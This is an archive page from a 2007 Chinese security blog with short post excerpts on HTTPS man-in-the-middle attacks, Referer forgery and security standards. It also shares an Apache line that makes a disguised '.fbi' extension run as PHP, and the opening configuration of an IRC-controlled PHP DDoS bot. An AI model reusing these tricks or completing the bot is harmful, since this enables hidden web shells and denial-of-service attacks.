2007年10月的文章

https中间人攻击

最近在看这东东,因为一个项目有这个相关的东西,也算是学习一下吧

https中间人攻击

http://www.icylife.net/yunshu/show.php?id=468

关键词: 中间人 , https , 渗透 , 入侵 , 技术

北京奥运会的....

北京奥运会的....,假的。呼呼

beijing2008.jpg(缩略图)

beijing2008.jpg

大小: 16.75 KB
尺寸: 500 x 230
浏览: 218 次
点击打开新窗口浏览全图

关键词: 奥运会 , 北京 , 被黑站点

轮回的牛X BLOG

s.jpg - 大小: 23.4 KB - 尺寸: 423 x 172 - 点击打开新窗口浏览全图

AddType application/x-httpd-php .fbi

哈哈,这样就牛X了,呼呼

关键词: apache , 乱七八糟 , blog

技术只有满足需求才有价值

李彦宏对应届毕业的大学生发出忠告:技术只有满足需求才有价值。正因为缺少实现技术价值的空间,大学中学业成绩最好的同学有可能并不在日后的工作中取得更大的成就。
日前,百度董事长兼首席执行官李彦宏在南京大学面对近千名大学生发表演讲,并邀请“对互联网感兴趣的顶尖毕业生到百度工作,应届生最高年薪可达30万元”。他同时表示,在百度,毕业生能够获得超出从任何一个其他跨国公司所能获得的成长和回报。

» 阅读全文

关键词: 乱七八糟 , 技术

对国内目前信息安全专家与标准的理解

juan_5515 北京

反思一下当前的安全标准热:
因为中国的信息安全发展目前相对落后,缺乏标准和理论体系,所以大家都把眼光投到国外,于是从Rainbows 到CC,从bs7799iso13335 ,SSE -CMM,IATF从NIST到GAO,NSA,到ITSM,ITIL,BS15000,以及英国的 ,加拿大的,澳大利亚的 ...,一时间大家纷纷大谈标准,以及各种基于标准的认证,尤其是在安全服务领域,有一部分人还对各种国外标准盲目迷信和崇拜,似乎不谈标准就什么也干不成,不谈标准就不够专业,纷纷找来五花八门的东西,一方面还得借助英汉词典读着这些艰深晦涩的东西。

» 阅读全文

关键词: iso13335 , bs7799 , 安全标准 , 工作 , 信息安全

伪造HTTP-REFERER方法及防止伪造REFERER方法探讨

HTTP-REFERER这个变量已经越来越不可靠了,完全就是可以伪造出来的东东。

原理都是sock构造http头来senddata。其他语言什么的比如perl也可以,

目前比较简单的防御伪造referer的方法是用验证码(Session)。

现在有一些能防盗链软件的商业公司比如UUDOG,linkgate,VirtualWall什么的,都是开发的应用于IIS上面的dll。
有的是采用cookies验证、线程控制,有的是能随机生成文件名然后做URL重写。有的方法能的确达到不错的效果.

不过道高一尺,魔高一丈,这些雕虫小技终归是有破解方法的。

» 阅读全文

关键词: asp , 脚本渗透 , 漏洞 , php

PHP DDoS Bot


/*
php ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos"

» 阅读全文

关键词: bot , ddos , 代码收藏 , php

关于渗透测试自动化的可行性

渗透测试自动化工具, http://hi.baidu.com/darkne2s/blog/item/deb6921bbee9061b8718bf04.html ,好像还真有人在做这一块的努力哦。

其实好像很多人都想做,只是没有胆量和精力来完成这个事情。为这位仁兄加油吧

关键词: 渗透 , 工具

Total: 1612Next ›